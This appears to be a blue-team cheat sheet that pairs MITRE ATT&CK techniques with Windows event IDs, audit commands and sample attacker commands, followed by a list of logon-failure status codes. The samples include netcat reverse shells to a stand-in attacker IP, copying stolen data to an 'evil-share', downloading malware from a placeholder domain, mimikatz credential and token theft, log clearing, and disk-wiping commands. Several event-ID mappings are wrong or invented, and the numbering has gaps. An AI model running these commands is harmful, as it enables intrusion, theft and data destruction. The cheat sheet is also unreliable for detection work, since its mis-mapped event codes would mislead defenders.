Event Codes for fun & profit
Unauthorized Access Attempt:
ID: 001
MITRE Tactic & Techniques: Initial Access | Phishing [T1566.001]
Event ID & Code: 4625 | FAILED_LOGON
Status Code: 0x8007052e
Commands and Code:Auditpol /set /subcategory:"Logon" /success:enable /failure:enable
Description: An attempt to log on with incorrect credentials was made.
Example Offensive Codes and Commands:net use \\target-system\IPC$ /user:username wrongpassword
Malware Execution:
ID: 002
MITRE Tactic & Techniques: Execution | Command and Scripting Interpreter [T1059]
Status Code: N/A
Commands and Code:Set-ExecutionPolicy Unrestricted
Description: Execution of PowerShell script detected.
Example Offensive Codes and Commands:powershell -ep bypass -f malicious.ps1
Data Exfiltration:
ID: 003
MITRE Tactic & Techniques: Exfiltration | Data Compressed [T1560.001]
Event ID & Code: 5145 | FILE_SHARE_ACCESS
Status Code: N/A
Commands and Code:netsh trace start capture=yes
Description: Unauthorized access to file share detected.
Example Offensive Codes and Commands:copy /Z secretdata.zip \\evil-share\stolen-data\
Lateral Movement:
ID: 004
MITRE Tactic & Techniques: Lateral Movement | Remote Services: SMB/Windows Admin Shares [T1021.002]
Event ID & Code: 5145 | FILE_SHARE_ACCESS
Status Code:** N/A
Commands and Code:** net share admin$ /grant:username,FULL
Description: Unauthorized access to administrative shares detected.
Example Offensive Codes and Commands:net use \\target-system\admin$ /user:username password
Privilege Escalation:
ID: 005
MITRE Tactic & Techniques:** Privilege Escalation | Bypass User Account Control [T1548.002]
Status Code:** N/A
Commands and Code:** schtasks /run /tn "elevatedtask"
Description: Attempt to elevate privileges detected.
Example Offensive Codes and Commands:bypassuac.exe
Command and Control:
ID: 006
MITRE Tactic & Techniques: Command and Control | Commonly Used Port [T1043]
Status Code: N/A
Commands and Code:netstat -an | findstr "443"
Description: Unusual network connection on commonly used port detected.
Example Offensive Codes and Commands:nc -e cmd.exe attacker-ip 443
Credential Dumping:
ID: 007
MITRE Tactic & Techniques: Credential Access | Credential Dumping [T1003]
Event ID & Code: 1102 | LOG_CLEAR
Status Code: N/A
Commands and Code:wevtutil cl Security
Description: Security log cleared possibly to hide credential dumping.
Example Offensive Codes and Commands:mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Domain Trust Discovery:
ID: 008
MITRE Tactic & Techniques: Discovery | Domain Trust Discovery [T1482]
Status Code: N/A
Commands and Code:nltest /domain_trusts
Description: Explicit credential logon to discover domain trusts.
Example Offensive Codes and Commands:** nltest /dclist:domain
Network Scanning:
ID: 009
MITRE Tactic & Techniques: Discovery | Network Service Scanning [T1046]
Status Code: N/A
Commands and Code:netstat -an | findstr "SYN_SENT"
Description: Network scanning activity detected through unusual SYN_SENT statuses.
Example Offensive Codes and Commands:nmap -sS target-ip
File Deletion:
ID: 010
MITRE Tactic & Techniques: Defense Evasion | Indicator Removal on Host [T1070.004]
Event ID & Code:** 4663 | FILE_DELETED
Status Code:** N/A
Commands and Code:** del /F /Q malicious-file.exe
Description:** Deletion of files to evade detection or remove evidence.
Example Offensive Codes and Commands:** sdelete -p 7 malicious-file.exe
System Reconfiguration:
ID: 011
MITRE Tactic & Techniques:** Persistence | Modify System Image [T1542.003]
Event ID & Code:** 7045 | SERVICE_INSTALLED
Status Code: N/A Commands and Code:** sc create malicioussvc binPath= "malicious-file.exe"
Description: Installation of a new service which could indicate system reconfiguration for persistence.
Example Offensive Codes and Commands:sc create evilservice binPath= "C:\path\to\malicious.exe"
ID: 012
MITRE Tactic & Techniques: Execution | Scripting [T1064]
Status Code: N/A
Commands and Code:Set-ExecutionPolicy Bypass
Description:** Execution of scripts to automate tasks, potentially malicious.
Example Offensive Codes and Commands:powershell -File malicious-script.ps1
Suspicious Process Execution:
ID: 013
MITRE Tactic & Techniques:** Execution | Malicious File Execution [T1204]
Event ID & Code:** 4688 | PROCESS_CREATED
Status Code: N/A
Commands and Code:Get-Process -Name suspicious-process
Description:** Execution of a potentially malicious process.
Example Offensive Codes and Commands:** start malicious-file.exe
Remote Process Execution:
ID:** 014
MITRE Tactic & Techniques:** Lateral Movement | Remote File Copy [T1021.002]
Event ID & Code:** 4697 | SERVICE_CREATED
Status Code: N/A
Commands and Code:sc \\remote-system create remotesvc binPath= "malicious-file.exe"
Description: Creation of a new service for remote process execution.
Example Offensive Codes and Commands:** psexec \\remote-system -c malicious-file.exe
Script-Based Process Execution:
ID: 015
MITRE Tactic & Techniques:** Execution | Scripting [T1064]
Status Code: N/A
Commands and Code:** powershell -File script.ps1
Description: Execution of PowerShell scripts to initiate processes.
Example Offensive Codes and Commands:powershell -EncodedCommand [Base64EncodedScript]
Process Injection:
ID: 016
MITRE Tactic & Techniques: Defense Evasion | Process Injection [T1055]
Event ID & Code:** 8 | CREATE_PROCESS
Status Code:** N/A
Commands and Code:** Get-Process -Name injected-process
Description:** Process injection to evade detection and execute malicious code.
Example Offensive Codes and Commands:Inject-Process -ProcessName legitimate-process -Payload malicious-payload
Scheduled Task Execution:
ID: 017
MITRE Tactic & Techniques: Execution | Scheduled Task/Job [T1053]
Status Code: N/A
Commands and Code:** schtasks /create /tn "malicious-task" /tr "malicious-file.exe"
Description:** Creation of scheduled tasks to execute processes at specified times.
Example Offensive Codes and Commands:** schtasks /run /tn "malicious-task"
Token Impersonation:
ID: 018
MITRE Tactic & Techniques: Defense Evasion | Token Manipulation [T1134]
Status Code: N/A
Commands and Code:** whoami /priv
Description:** Assignment of special privileges indicative of token impersonation.
Example Offensive Codes and Commands:** mimikatz "privilege::debug" "token::elevate"
Create Process with Token:
ID:** 019
MITRE Tactic & Techniques:** Privilege Escalation | Create Process with Token [T1134.002]
Event ID & Code:** 4688 | PROCESS_CREATED
Status Code:** N/A
Commands and Code:** Get-Process -Name new-process
Description: New process created with a token from another process.
Example Offensive Codes and Commands:mimikatz "token::run" "process::create"
Token Duplication:
ID: 020
MITRE Tactic & Techniques:** Defense Evasion | Token Manipulation [T1134]
Event ID & Code:** 1102 | DUPLICATE_TOKEN
Status Code:** N/A
Commands and Code:** Get-EventLog -LogName Security -InstanceId 1102
Description:** Duplication of a token to use in a new process.
Example Offensive Codes and Commands:** mimikatz "token::duplicate"
Modify Token Privileges:
ID:** 021
MITRE Tactic & Techniques:** Privilege Escalation | Modify Token [T1134.005]
Status Code:** N/A
Commands and Code:** whoami /priv
Description:** Modification of token privileges to elevate or change permissions.
Example Offensive Codes and Commands:mimikatz "token::addpriv" "SeDebugPrivilege"
Token Theft:
ID: 022
MITRE Tactic & Techniques: Defense Evasion | Token Manipulation [T1134]
Status Code:** N/A
Commands and Code:** whoami /priv
Description:** Theft of a token to impersonate another user or escalate privileges.
Example Offensive Codes and Commands:mimikatz "token::steal" [Token ID]
PowerShell Script Execution:
ID: 023
MITRE Tactic & Techniques:** Execution | PowerShell [T1059.001]
Event ID & Code:** 4104 | SCRIPT_BLOCK_LOGGING
Status Code: N/A
Commands and Code:Set-ExecutionPolicy Bypass
Description:** Execution of PowerShell scripts which could be malicious.
Example Offensive Codes and Commands:** powershell -File malicious-script.ps1
PowerShell Remote Command Execution:
ID: 024
MITRE Tactic & Techniques: Lateral Movement | Remote PowerShell Session [T1021.006]
Event ID & Code:** 4103 | ENGINE_LIFECYCLE
Status Code:** N/A
Commands and Code:** Enter-PSSession -ComputerName target-system
Description:** Initiating a remote PowerShell session for lateral movement.
Example Offensive Codes and Commands:** Invoke-Command -ComputerName target-system -ScriptBlock { malicious-command }
PowerShell Downloader Script:
ID: 025
MITRE Tactic & Techniques:** Command and Control | Ingress Tool Transfer [T1105]
Event ID & Code: 4104 | SCRIPT_BLOCK_LOGGING
Status Code:** N/A
Commands and Code:** IWR -URI http://malicious.com/malware.exe -OutFile C:\path\malware.exe
Description: PowerShell used to download malicious files from external sources.
Example Offensive Codes and Commands:
powershell -command "IWR -URI http://malicious.com/malware.exe -OutFile C:\path\malware.exe"
PowerShell Credential Dumping:
ID: 026
MITRE Tactic & Techniques: Credential Access | Credential Dumping [T1003]
Event ID & Code:** 4104 | SCRIPT_BLOCK_LOGGING
Status Code:** N/A
Commands and Code:** Get-WmiObject -Class Win32_UserAccount
Description:** PowerShell commands used to access or dump credentials.
Example Offensive Codes and Commands:** powershell -command "Get-WmiObject -Class Win32_UserAccount"
PowerShell Registry Modification:
ID: 027
MITRE Tactic & Techniques:** Defense Evasion | Modify Registry [T1112]
Event ID & Code:** 4104 | SCRIPT_BLOCK_LOGGING
Status Code: N/A
Commands and Code:** Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\malicious-service' -Name "Start" -Value 2
Description:** PowerShell commands used to modify registry entries for evasion or persistence.
Example Offensive Codes and Commands:** powershell -command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\malicious-service' -Name 'Start' -Value 2"
WMI Persistence:
ID: 033
MITRE Tactic & Techniques:** Persistence | Event Triggered Execution: Windows Management Instrumentation Event Subscription [T1546.003]
Status Code: N/A
Commands and Code:** Get-WmiObject -Class __EventFilter -Namespace root\subscription
Description:** Binding of WMI filter to consumer indicating a potential persistence mechanism.
Example Offensive Codes and Commands:wmic /namespace:\\root\subscription /interactive:off PATH CommandLineEventConsumer CREATE
WMI Remote Execution:
ID: 034
MITRE Tactic & Techniques:** Lateral Movement | Remote Services: Windows Management Instrumentation [T1021.005] Event ID & Code:** 5858 | WMI_ACTIVITY_EXECQUERY
Status Code:** N/A
Commands and Code:** Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "malicious-file.exe"
Description:** Remote execution of commands or scripts via WMI.
Example Offensive Codes and Commands:** wmic /node:target-system process call create "malicious-file.exe"
WMI Data Queries:
ID: 035
MITRE Tactic & Techniques:** Discovery | Remote System Discovery [T1018]
Event ID & Code:** 5858 | WMI_ACTIVITY_EXECQUERY
Status Code: N/A
Commands and Code:** Get-WmiObject -Class Win32_ComputerSystem
Description:** Querying system information via WMI for reconnaissance.
Example Offensive Codes and Commands:** wmic computersystem get model,name,manufacturer
WMI System Configuration Modification:
ID:** 036
MITRE Tactic & Techniques:** Defense Evasion | Modify System Image [T1542.003]
Event ID & Code:** 5858 | WMI_ACTIVITY_EXECQUERY
Status Code:** N/A
Commands and Code:** Set-WmiInstance -Class Win32_OperatingSystem -Property @{Description='Modified System'}
Description:** Modifying system configurations via WMI.
Example Offensive Codes and Commands:** wmic os set description="Modified System"
WMI Service Control:
ID:** 037
MITRE Tactic & Techniques: Execution | Service Execution [T1569.002]
Event ID & Code:** 5858 | WMI_ACTIVITY_EXECQUERY
Status Code:** N/A
Commands and Code:** Get-WmiObject -Class Win32_Service | Where-Object {$_.Name -eq 'malicioussvc'} | Invoke-WmiMethod -Name StartService
Description:** Controlling services via WMI.
Example Offensive Codes and Commands:** wmic service malicioussvc call startservice
Unauthorized Outbound Traffic:**
ID: 038
MITRE Tactic & Techniques:** Command and Control | Commonly Used Port [T1043]
Event ID & Code:** 5157 | FIREWALL_BLOCK
Status Code:** N/A
Commands and Code:** Get-WinEvent -LogName "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
Description:** Firewall blocked unauthorized outbound traffic to a suspicious IP.
Example Offensive Codes and Commands:nc -e cmd.exe attacker-ip 443
Inbound Connection Attempt:
ID:** 039
MITRE Tactic & Techniques:** Initial Access | External Remote Services [T1133]
Event ID & Code:** 5157 | FIREWALL_BLOCK
Status Code:** N/A
Commands and Code:** netsh advfirewall firewall show rule name=all
Description:** Firewall blocked an unauthorized inbound connection attempt.
Example Offensive Codes and Commands:** nc -lvp 4444
Proxy Evasion Detection:**
ID:** 040
MITRE Tactic & Techniques:** Defense Evasion | Proxy/Protocol Evasion [T1090.003]
Event ID & Code: 5157 | FIREWALL_BLOCK
Status Code: N/A
Commands and Code:** Get-NetFirewallRule -Direction Outbound | Where-Object { $_.Enabled -eq True }
Description:** Unauthorized attempt to bypass proxy restrictions detected.
Example Offensive Codes and Commands:** curl -x http://evil-proxy:8080 http://target-website.com
Suspicious URL Request:
ID:** 041
MITRE Tactic & Techniques:** Command and Control | Web Service [T1102]
Event ID & Code:** 5157 | FIREWALL_BLOCK
Status Code:** N/A
Commands and Code:** grep "suspicious-url" /var/log/proxy.log
Description: Firewall or proxy log showing a request to a suspicious URL.
Example Offensive Codes and Commands:** curl http://suspicious-url.com/malicious-payload
Unusual Protocol Usage:
ID:** 042
MITRE Tactic & Techniques:** Command and Control | Non-Standard Port [T1571]
Event ID & Code:** 5157 | FIREWALL_BLOCK
Status Code:** N/A
Commands and Code:** netsh advfirewall firewall add rule name="Block Non-Standard Port" dir=out remoteport=1337 action=block
Description:** Firewall blocked traffic on a non-standard port indicating unusual protocol usage.
Example Offensive Codes and Commands:** nc -e cmd.exe attacker-ip 1337
Code Obfuscation:
ID: 043
MITRE Tactic & Techniques:** Defense Evasion | Obfuscated Files or Information [T1027]
Event ID & Code: 4104 | SCRIPT_BLOCK_LOGGING
Status Code:** N/A
Commands and Code:** powershell -encodedcommand <Base64EncodedCommand>
Description:** Executing obfuscated PowerShell commands.
Example Offensive Codes and Commands:powershell -encodedcommand U3RhcnQtUHJvY2Vzcw==
(Base64 for Start-Process
Disabling Security Tools:
ID: 044
MITRE Tactic & Techniques:** Defense Evasion | Indicator Blocking [T1054]
Event ID & Code:** 7045 | SERVICE_INSTALLED
Status Code:** N/A
Commands and Code:** sc config "SecurityService" start= disabled
Description:** Disabling security services to evade detection.
Example Offensive Codes and Commands:** sc stop "SecurityService"
Tampering with Log Files:
ID:** 045
MITRE Tactic & Techniques:** Defense Evasion | Indicator Removal on Host [T1070]
Event ID & Code:** 1102 | LOG_CLEARED
Status Code: N/A
Commands and Code:** wevtutil cl Security
Description:** Clearing event logs to hide malicious activities.
Example Offensive Codes and Commands:** wevtutil cl System
Bypassing User Account Control (UAC):
ID:** 046
MITRE Tactic & Techniques:** Defense Evasion | Bypass User Access Control [T1548.002]
Status Code:** N/A
Commands and Code:** fodhelper.exe
Description:** Utilizing binaries to bypass UAC and elevate privileges.
Example Offensive Codes and Commands:** fodhelper.exe malicious-script.ps1
Rootkit Installation:**
ID: 047
MITRE Tactic & Techniques: Defense Evasion | Rootkit [T1014]
Event ID & Code:** 7000 | SERVICE_START_FAILED
Status Code:** N/A
Commands and Code:sc create rootkit binPath= "C:\path\rootkit.sys"
Description:** Installing a rootkit to hide malicious processes and files.
Example Offensive Codes and Commands:** sc start rootkit
Data Destruction:
ID: 048
MITRE Tactic & Techniques:** Impact | Data Destruction [T1485]
Event ID & Code:** 4660 | OBJECT_DELETED
Status Code:** N/A
Commands and Code:del /F /Q C:\important\*
Description:** Deliberate deletion of critical data.
Example Offensive Codes and Commands:** cipher /W:C:\important
Disk Wipe:**
ID: 049
MITRE Tactic & Techniques: Impact | Disk Wipe [T1561]
Event ID & Code:** 4660 | OBJECT_DELETED
Status Code:** N/A
Commands and Code:** format C: /P:1
Description:** Formatting the disk to wipe data.
Example Offensive Codes and Commands:** diskpart clean disk 0
Resource Hijacking:
ID:** 050
MITRE Tactic & Techniques: Impact | Resource Hijacking [T1496]
Event ID & Code:** 4689 | PROCESS_TERMINATED
Status Code:** N/A
Commands and Code:** start cryptominer.exe
Description:** Unauthorized use of resources for cryptomining.
Example Offensive Codes and Commands:** cryptominer.exe -pool miningpool.com -user username -pass password
Service Stop:**
ID:** 051
MITRE Tactic & Techniques:** Impact | Inhibit System Recovery [T1490]
Event ID & Code:** 7034 | SERVICE_CRASHED
Status Code:** N/A
Commands and Code:** net stop "Critical Service"
Description: Stopping critical services to impair system recovery.
Example Offensive Codes and Commands:** sc stop "Critical Service"
Endpoint Denial of Service:
ID: 052
MITRE Tactic & Techniques:** Impact | Endpoint Denial of Service [T1498]
Status Code:** N/A
Commands and Code:** hping3 --flood --rand-source target-system
Description:** Flooding the target system with network requests to cause denial of service.
Example Offensive Codes and Commands:loic.exe /target target-system /method TCP /threads 10
Status: 0xC000006D
Sub Status: 0xC000006A
Description: This indicates that the attempted logon failed due to an incorrect password.
Status: 0xC000006D
Sub Status: 0xC0000064
Description: This indicates that the specified username does not exist.
Status: 0xC000006D
Sub Status: 0xC000006F
Description: The user attempted to log on outside of allowed times as defined by the account's logon hours.
Status: 0xC000006D
Sub Status: 0xC0000070
Description: The user is attempting to log on from a workstation or through a trusted domain that is not allowed.
Status: 0xC000006D
Sub Status: 0xC0000071
Description: The password for the specified account has expired.
Status: 0xC000006D
Sub Status: 0xC0000072
Description: The account is disabled and cannot be accessed.
Status: 0xC000006D
Sub Status: 0xC000015B
Description: The user has not been granted the requested logon type at this machine.
Status: 0xC000006D
Sub Status: 0xC0000193
Description: The account's password must be changed before logging on the first time.
Status: 0xC000006E
Sub Status: 0x0
Description: Account restrictions are preventing this user from signing in.
Status: 0xC0000070
Sub Status: 0x0
Description: The referenced account is currently locked out and may not be logged on to.
Status: 0xC0000072
Sub Status: 0x0
Description: The account is currently disabled.
Status: 0xC0000133
Sub Status: 0x0
Description: Clocks on the client and server machines are skewed.
Status: 0xC000015B
Sub Status: 0x0
Description: The user has not been granted the requested logon type at this machine.
Status: 0xC000018C
Sub Status: 0x0
Description: The logon request failed because the trust relationship between the primary domain and the trusted domain failed.
Status: 0xC0000192
Sub Status: 0x0
Description: An attempt was made to logon, but the network logon service was not started.
Status: 0xC0000193
Sub Status: 0x0
Description: The user's password must be changed before logging on the first time.
Status: 0xC0000224
Sub Status: 0x0
Description: User logon with a password must change at next logon condition.
Status: 0xC0000234
Sub Status: 0x0
Description: The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested.
Status: 0xC00002EE
Sub Status: 0x0
Description: Failure actions can only be delayed for a period of one hour.
Status: 0xC0000371
Sub Status: 0x0
Description: The local account store does not contain secret material for the specified account.
Effective Threat Investigation by Mostafa Yahia https://github.com/jsecurity101/Windows-API-To-Sysmon-Events